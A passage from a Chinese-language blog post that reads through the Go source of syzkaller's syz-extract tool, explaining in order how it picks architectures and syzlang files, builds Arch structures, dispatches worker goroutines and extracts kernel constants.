&#123;</span><br><span class="line">    failed = checkUnsupportedCalls(arches)</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">for</span> _, arch := <span class="keyword">range</span> arches &#123;</span><br><span class="line">    <span class="keyword">if</span> arch.build &#123;</span><br><span class="line">        os.RemoveAll(arch.buildDir)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> failed &#123;</span><br><span class="line">    os.Exit(<span class="number">1</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="2-archFileList">2. archFileList</h3><p>archFileList 函数用于解析传入的参数信息，代码量非常短。</p><p>首先，调用者需要将 <strong>OS 字符串</strong>、<strong>arch 字符串</strong>，以及<strong>存放 syzlang 文件路径的字符串数组</strong>传入该函数：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">archFileList</span><span class="params">(os, arch <span class="type">string</span>, files []<span class="type">string</span>)</span></span> </span><br><span class="line">    (<span class="type">string</span>, []<span class="type">string</span>, []<span class="type">string</span>, <span class="type">error</span>) </span><br></pre></td></tr></table></figure><p>之后，archFileList 会对 android 设置一些特殊的字段，然后切割参数字符串 arch，并将切割后的结果全保存进<strong>字符串数组 arches</strong> 中。若没有指定 arches 参数，则添加全部的 arch 进 arches 数组中。</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in archFileList Function</span></span><br><span class="line"><span class="comment">// Note: this is linux-specific and should be part of Extractor and moved to linux.go.</span></span><br><span class="line">android := <span class="literal">false</span></span><br><span class="line"><span class="keyword">if</span> os == <span class="string">&quot;android&quot;</span> &#123;</span><br><span class="line">    android = <span class="literal">true</span></span><br><span class="line">    os = targets.Linux</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">var</span> arches []<span class="type">string</span></span><br><span class="line"><span class="keyword">if</span> arch != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">    arches = strings.Split(arch, <span class="string">&quot;,&quot;</span>)</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">for</span> arch := <span class="keyword">range</span> targets.List[os] &#123;</span><br><span class="line">        arches = <span class="built_in">append</span>(arches, arch)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> android &#123;</span><br><span class="line">        arches = []<span class="type">string</span>&#123;targets.I386, targets.AMD64, targets.ARM, targets.ARM64&#125;</span><br><span class="line">    &#125;</span><br><span class="line">    sort.Strings(arches)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其中，<code>targets.List</code> 是一个 map 映射（即 <code>sys/targets/targets.go</code> 中的 List 变量），这上面存放了很多关于不同 OS 以及这些 OS 在特定 arch 下的信息，以下是一个精简后的代码片段：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// nolint: lll</span></span><br><span class="line"><span class="keyword">var</span> List = <span class="keyword">map</span>[<span class="type">string</span>]<span class="keyword">map</span>[<span class="type">string</span>]*Target&#123;</span><br><span class="line">    ...,</span><br><span class="line">    Linux: &#123;</span><br><span class="line">        AMD64: &#123;</span><br><span class="line">            PtrSize:          <span class="number">8</span>,</span><br><span class="line">            PageSize:         <span class="number">4</span> &lt;&lt; <span class="number">10</span>,</span><br><span class="line">            LittleEndian:     <span class="literal">true</span>,</span><br><span class="line">            CFlags:           []<span class="type">string</span>&#123;<span class="string">&quot;-m64&quot;</span>&#125;,</span><br><span class="line">            Triple:           <span class="string">&quot;x86_64-linux-gnu&quot;</span>,</span><br><span class="line">            KernelArch:       <span class="string">&quot;x86_64&quot;</span>,</span><br><span class="line">            KernelHeaderArch: <span class="string">&quot;x86&quot;</span>,</span><br><span class="line">            NeedSyscallDefine: <span class="function"><span class="keyword">func</span><span class="params">(nr <span class="type">uint64</span>)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line">                <span class="comment">// Only generate defines for new syscalls</span></span><br><span class="line">                <span class="comment">// (added after commit 8a1ab3155c2ac on 2012-10-04).</span></span><br><span class="line">                <span class="keyword">return</span> nr &gt;= <span class="number">313</span></span><br><span class="line">            &#125;,</span><br><span class="line">        &#125;,</span><br><span class="line">        I386: &#123;</span><br><span class="line">            VMArch:           AMD64,</span><br><span class="line">            PtrSize:          <span class="number">4</span>,</span><br><span class="line">            PageSize:         <span class="number">4</span> &lt;&lt; <span class="number">10</span>,</span><br><span class="line">            Int64Alignment:   <span class="number">4</span>,</span><br><span class="line">            LittleEndian:     <span class="literal">true</span>,</span><br><span class="line">            CFlags:           []<span class="type">string</span>&#123;<span class="string">&quot;-m32&quot;</span>&#125;,</span><br><span class="line">            Triple:           <span class="string">&quot;x86_64-linux-gnu&quot;</span>,</span><br><span class="line">            KernelArch:       <span class="string">&quot;i386&quot;</span>,</span><br><span class="line">            KernelHeaderArch: <span class="string">&quot;x86&quot;</span>,</span><br><span class="line">        &#125;,</span><br><span class="line">        ...</span><br><span class="line">    &#125;,</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>不过在 <code>for arch := range targets.List[os]</code> 的过程中，只会取出这些 map 的 key 值，即一系列的架构字符串，因此最后 archs 数据中存放的值如下：</p><p><img src="/2022/03/syzkaller-1/image-20220309090646115.png" alt="image-20220309090646115"></p><p>接下来我们回到函数 archFileList 中：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in archFileList Function</span></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(files) == <span class="number">0</span> &#123;</span><br><span class="line">        matches, err := filepath.Glob(filepath.Join(<span class="string">&quot;sys&quot;</span>, os, <span class="string">&quot;*.txt&quot;</span>))</span><br><span class="line">        <span class="keyword">if</span> err != <span class="literal">nil</span> || <span class="built_in">len</span>(matches) == <span class="number">0</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&quot;&quot;</span>, <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to find sys files: %v&quot;</span>, err)</span><br><span class="line">        &#125;</span><br><span class="line">        manualFiles := <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>&#123;</span><br><span class="line">            <span class="comment">// Not upstream, generated on https://github.com/multipath-tcp/mptcp_net-next</span></span><br><span class="line">            <span class="string">&quot;vnet_mptcp.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// Was in linux-next, but then was removed, fate is unknown.</span></span><br><span class="line">            <span class="string">&quot;dev_watch_queue.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// Not upstream, generated on:</span></span><br><span class="line">            <span class="comment">// https://chromium.googlesource.com/chromiumos/third_party/kernel d2a8a1eb8b86</span></span><br><span class="line">            <span class="string">&quot;dev_bifrost.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// ION support was removed from kernel.</span></span><br><span class="line">            <span class="comment">// We plan to leave the descriptions for some time as is and later remove them.</span></span><br><span class="line">            <span class="string">&quot;dev_ion.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// Not upstream, generated on unknown tree.</span></span><br><span class="line">            <span class="string">&quot;dev_img_rogue.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">        &#125;</span><br><span class="line">        androidFiles := <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>&#123;</span><br><span class="line">            <span class="string">&quot;dev_tlk_device.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// This was generated on:</span></span><br><span class="line">            <span class="comment">// https://source.codeaurora.org/quic/la/kernel/msm-4.9 msm-4.9</span></span><br><span class="line">            <span class="string">&quot;dev_video4linux.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="comment">// This was generated on:</span></span><br><span class="line">            <span class="comment">// https://chromium.googlesource.com/chromiumos/third_party/kernel 3a36438201f3</span></span><br><span class="line">            <span class="string">&quot;fs_incfs.txt&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">for</span> _, f := <span class="keyword">range</span> matches &#123;</span><br><span class="line">            f = filepath.Base(f)</span><br><span class="line">            <span class="keyword">if</span> manualFiles[f] || os == targets.Linux &amp;&amp; android != androidFiles[f] &#123;</span><br><span class="line">                <span class="keyword">continue</span></span><br><span class="line">            &#125;</span><br><span class="line">            files = <span class="built_in">append</span>(files, f)</span><br><span class="line">        &#125;</span><br><span class="line">        sort.Strings(files)</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure><p>若传入的参数 <code>files</code> 为空，则 syz-extract 将尝试自动添加文件进入。在这一部分代码中：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">matches, err := filepath.Glob(filepath.Join(<span class="string">&quot;sys&quot;</span>, os, <span class="string">&quot;*.txt&quot;</span>))</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> || <span class="built_in">len</span>(matches) == <span class="number">0</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>, <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to find sys files: %v&quot;</span>, err)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>syz-extract 将尝试解析路径 <code>sys/linux/*.txt</code> 路径，并将解析结果存放进 matches 数组中：</p><p><img src="/2022/03/syzkaller-1/image-20220309090909852.png" alt="image-20220309090909852"></p><p>之后，在下面的代码中，跳过人工添加的文件，以及 android 不允许添加的文件（androidFiles 映射中 value 为 false 的条目），最后为结果数组做个顺序排序：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in archFileList Function</span></span><br><span class="line"><span class="keyword">for</span> _, f := <span class="keyword">range</span> matches &#123;</span><br><span class="line">    f = filepath.Base(f)</span><br><span class="line">    <span class="keyword">if</span> manualFiles[f] || os == targets.Linux &amp;&amp; android != androidFiles[f] &#123;</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    &#125;</span><br><span class="line">    files = <span class="built_in">append</span>(files, f)</span><br><span class="line">&#125;</span><br><span class="line">sort.Strings(files)</span><br></pre></td></tr></table></figure><p>函数结束，结果返回：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in archFileList Function</span></span><br><span class="line"><span class="keyword">return</span> os, arches, files, <span class="literal">nil</span></span><br></pre></td></tr></table></figure><h3 id="3-createArches">3. createArches</h3><p>该函数用于生成与参数对应的 Arch 结构体数组。该函数内容较少，因此笔记以注释形式内嵌在函数中：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">createArches</span><span class="params">(OS <span class="type">string</span>, archArray, files []<span class="type">string</span>)</span></span> ([]*Arch, <span class="type">error</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> arches []*Arch</span><br><span class="line">    <span class="comment">// 遍历 archArray 结构体</span></span><br><span class="line">    <span class="keyword">for</span> _, archStr := <span class="keyword">range</span> archArray &#123;</span><br><span class="line">        <span class="comment">// 尝试确定 buid 文件夹路径</span></span><br><span class="line">        buildDir := <span class="string">&quot;&quot;</span></span><br><span class="line">        <span class="keyword">if</span> *flagBuild &#123;</span><br><span class="line">            dir, err := ioutil.TempDir(<span class="string">&quot;&quot;</span>, <span class="string">&quot;syzkaller-kernel-build&quot;</span>)</span><br><span class="line">            <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to create temp dir: %v&quot;</span>, err)</span><br><span class="line">            &#125;</span><br><span class="line">            buildDir = dir</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> *flagBuildDir != <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">            buildDir = *flagBuildDir</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            buildDir = *flagSourceDir</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 获取 targets.List 中对应与 OS 和 arch 的 `Target` 结构体</span></span><br><span class="line">        target := targets.Get(OS, archStr)</span><br><span class="line">        <span class="keyword">if</span> target == <span class="literal">nil</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;unknown arch: %v&quot;</span>, archStr)</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 创建 arch 结构体</span></span><br><span class="line">        arch := &amp;Arch&#123;</span><br><span class="line">            <span class="comment">// 存放特定 OS 特定 arch 的一些信息</span></span><br><span class="line">            target:      target,</span><br><span class="line">            <span class="comment">// kernel source 路径</span></span><br><span class="line">            sourceDir:   *flagSourceDir,</span><br><span class="line">            <span class="comment">// kernel source header 路径</span></span><br><span class="line">            includeDirs: *flagIncludes,</span><br><span class="line">            <span class="comment">// build 路径</span></span><br><span class="line">            buildDir:    buildDir,</span><br><span class="line">            <span class="comment">// bool 值，是否需要重新生成架构指定的 kernel header</span></span><br><span class="line">            build:       *flagBuild,</span><br><span class="line">            <span class="comment">// 管道，用于 go routine 间通信。当 arch 分析完成后，将会向该管道通知</span></span><br><span class="line">            done:        <span class="built_in">make</span>(<span class="keyword">chan</span> <span class="type">bool</span>),</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 将 syzlang 文件名数组添加进 arch 结构体中</span></span><br><span class="line">        <span class="keyword">for</span> _, f := <span class="keyword">range</span> files &#123;</span><br><span class="line">            arch.files = <span class="built_in">append</span>(arch.files, &amp;File&#123;</span><br><span class="line">                arch: arch,</span><br><span class="line">                name: f,</span><br><span class="line">                <span class="comment">// 管道，用于 go routine 间通信。当 file 分析完成后，将会向该管道通知</span></span><br><span class="line">                done: <span class="built_in">make</span>(<span class="keyword">chan</span> <span class="type">bool</span>),</span><br><span class="line">            &#125;)</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 将新创建的 arch 结构体放置进 arches 数组中</span></span><br><span class="line">        arches = <span class="built_in">append</span>(arches, arch)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> arches, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="4-worker">4. worker</h3><p>worker 用于执行真正的解析变量工作：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">worker</span><span class="params">(extractor Extractor, jobC <span class="keyword">chan</span> <span class="keyword">interface</span>&#123;&#125;)</span></span> </span><br></pre></td></tr></table></figure><p>对于管道 jobC 中的元素来说，初始时在 main 函数放进去的肯定是 Arch 结构体：</p><p><img src="/2022/03/syzkaller-1/image-20220309095730698.png" alt="image-20220309095730698"></p><p>因此初始时 worker 内部的 switch 将检测到传入的变量类型为 Arch 结构：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `worker`</span></span><br><span class="line"><span class="keyword">for</span> job := <span class="keyword">range</span> jobC &#123;</span><br><span class="line">    <span class="comment">// 为 j 赋值为 jobC 管道中的对象，初始时为 Arch</span></span><br><span class="line">    <span class="keyword">switch</span> j := job.(<span class="keyword">type</span>) &#123;</span><br><span class="line">        <span class="comment">// 最开始的时候肯定会走入这个分支</span></span><br><span class="line">        <span class="keyword">case</span> *Arch:</span><br><span class="line">            <span class="comment">// 执行 processArch，生成 const 信息</span></span><br><span class="line">            infos, err := processArch(extractor, j)</span><br><span class="line">            j.err = err</span><br><span class="line">            <span class="built_in">close</span>(j.done)</span><br><span class="line">            <span class="keyword">if</span> j.err == <span class="literal">nil</span> &#123;</span><br><span class="line">                <span class="keyword">for</span> _, f := <span class="keyword">range</span> j.files &#123;</span><br><span class="line">                    f.info = infos[filepath.Join(<span class="string">&quot;sys&quot;</span>, j.target.OS, f.name)]</span><br><span class="line">                    jobC &lt;- f</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        <span class="keyword">case</span> *File:</span><br><span class="line">            j.consts, j.undeclared, j.err = processFile(extractor, j.arch, j)</span><br><span class="line">            <span class="built_in">close</span>(j.done)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>注意到变量 j 就是从 jobC 中取出来的 Arch 结构体，因此在 processArch 操作完成后，worker 函数会分别从 infos 映射中遍历取出对应文件的信息，并将其填充至 <strong>arch 结构体</strong>中 <strong>files 结构体数组</strong>内的各个元素字段里：</p><p><img src="/2022/03/syzkaller-1/image-20220309111211911.png" alt="image-20220309111211911"></p><p>最后执行 <code>jobC &lt;- f</code> 操作，将这个 File 结构体放入 jobC 管道中。</p><p>由于 worker 函数是会循环读取 jobC 内数据，因此 worker 函数接下来便会取出刚刚新放入的 File 结构体，执行 <code>processFile</code> 函数。在 processFile 中，syz-extract 将会获取各个 const 变量（例如 O_RDWR）所对应的整型值(例如2)。</p><p>worker 函数中还有一个关键点需要注意，当 processXXX 函数执行完成后，worker 函数接下来都会执行 <code>close(j.done)</code> ，将通信管道关闭。这样做的目的是为了通知 main goroutine “某部分工作已经完成”。这个操作有点类似于使用信号量来保证线程同步。</p><h3 id="5-processArch">5. processArch</h3><p>processArch 的作用是，处理传入的 Extractor 和 Arch 结构体，生成 const 信息。</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">processArch</span><span class="params">(extractor Extractor, arch *Arch)</span></span> (<span class="keyword">map</span>[<span class="type">string</span>]*compiler.ConstInfo, <span class="type">error</span>) &#123;</span><br><span class="line">    errBuf := <span class="built_in">new</span>(bytes.Buffer)</span><br><span class="line">    <span class="comment">// 定义 error handler 函数</span></span><br><span class="line">    eh := <span class="function"><span class="keyword">func</span><span class="params">(pos ast.Pos, msg <span class="type">string</span>)</span></span> &#123;</span><br><span class="line">        fmt.Fprintf(errBuf, <span class="string">&quot;%v: %v\n&quot;</span>, pos, msg)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 解析 sys/linux/*.txt 的 syzlang 文件，形成一个 AST 数组</span></span><br><span class="line">    <span class="comment">// 因此 top 变量就是 ast 森林的根节点</span></span><br><span class="line">    top := ast.ParseGlob(filepath.Join(<span class="string">&quot;sys&quot;</span>, arch.target.OS, <span class="string">&quot;*.txt&quot;</span>), eh)</span><br><span class="line">    <span class="keyword">if</span> top == <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;%v&quot;</span>, errBuf.String())</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 调用 compiler.ExtractConsts 获取每个 syzlang 文件中所对应的 const 信息</span></span><br><span class="line">    infos := compiler.ExtractConsts(top, arch.target, eh)</span><br><span class="line">    <span class="keyword">if</span> infos == <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;%v&quot;</span>, errBuf.String())</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 让 Extractor 为 arch 做些准备</span></span><br><span class="line">    <span class="keyword">if</span> err := extractor.prepareArch(arch); err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> infos, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其中，<code>compiler.ExtractConsts</code> 只是一个简单的 wrapper 函数，获取编译 syzlang 结果中的 fileConsts 字段：</p><p><img src="/2022/03/syzkaller-1/image-20220309104824331.png" alt="image-20220309104824331"></p><p>字段 res.fileConsts 包含了 <strong>syzlang 文件名</strong>与其<strong>用到的常量数组</strong>的映射，以及其所 include 的头文件数组的映射；这些东西都将会用到获取 consts 对应的具体整数操作中。</p><p>而 <code>extractor.prepareArch</code> 函数在 <code>linux.go</code> 中，做的操作主要是定义了几个头文件：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;stdarg.h&quot;</span>: `</span><br><span class="line"><span class="meta">#<span class="keyword">pragma</span> once</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> va_list __builtin_va_list</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> va_start __builtin_va_start</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> va_end __builtin_va_end</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> va_arg __builtin_va_arg</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> va_copy __builtin_va_copy</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> __va_copy __builtin_va_copy</span></span><br><span class="line">`,</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;asm/a.out.h&quot;</span>:    <span class="string">&quot;&quot;</span>,</span><br><span class="line"><span class="string">&quot;asm/prctl.h&quot;</span>:    <span class="string">&quot;&quot;</span>,</span><br><span class="line"><span class="string">&quot;asm/mce.h&quot;</span>:      <span class="string">&quot;&quot;</span>,</span><br><span class="line"><span class="string">&quot;uapi/asm/msr.h&quot;</span>: <span class="string">&quot;&quot;</span>,</span><br></pre></td></tr></table></figure><p>因为某些 arch 的 kernel src 可能会缺失这些文件，需要自己手动补全。补全之后 <code>extractor.prepareArch</code> 会重新执行一次 linux kernel make 生成。</p><p>回到 processArch 函数，该函数最后会把先前获取到的 consts info 返回给调用者：</p><p><img src="/2022/03/syzkaller-1/image-20220309110405501.png" alt="image-20220309110405501"></p><h3 id="6-processFile">6. processFile</h3><p>processFile 函数只是 extractor.processFile 的 wrapper，主要是做了一些 check 操作：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">processFile</span><span class="params">(extractor Extractor, arch *Arch, file *File)</span></span> (<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>, <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>, <span class="type">error</span>) &#123;</span><br><span class="line">    inname := filepath.Join(<span class="string">&quot;sys&quot;</span>, arch.target.OS, file.name)</span><br><span class="line">    <span class="keyword">if</span> file.info == <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;const info for input file %v is missing&quot;</span>, inname)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(file.info.Consts) == <span class="number">0</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, <span class="literal">nil</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> extractor.processFile(arch, file.info)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>实际用于查找 const 值的操作位于 <code>extractor.processFile</code>：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(*linux)</span></span> processFile(arch *Arch, info *compiler.ConstInfo) (<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>, <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>, <span class="type">error</span>) </span><br></pre></td></tr></table></figure><p>在 linux.go 中，<code>processFile</code> 初始时先过滤掉不满足条件的情况：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function processFile of sys/syz-extract/linux.go</span></span><br><span class="line"><span class="keyword">if</span> strings.HasSuffix(info.File, <span class="string">&quot;_kvm.txt&quot;</span>) &amp;&amp;</span><br><span class="line">    (arch.target.Arch == targets.ARM || arch.target.Arch == targets.RiscV64) &#123;</span><br><span class="line">    <span class="comment">// Hack: KVM is not supported on ARM anymore. We may want some more official support</span></span><br><span class="line">    <span class="comment">// for marking descriptions arch-specific, but so far this combination is the only</span></span><br><span class="line">    <span class="comment">// one. For riscv64, KVM is not supported yet but might be in the future.</span></span><br><span class="line">    <span 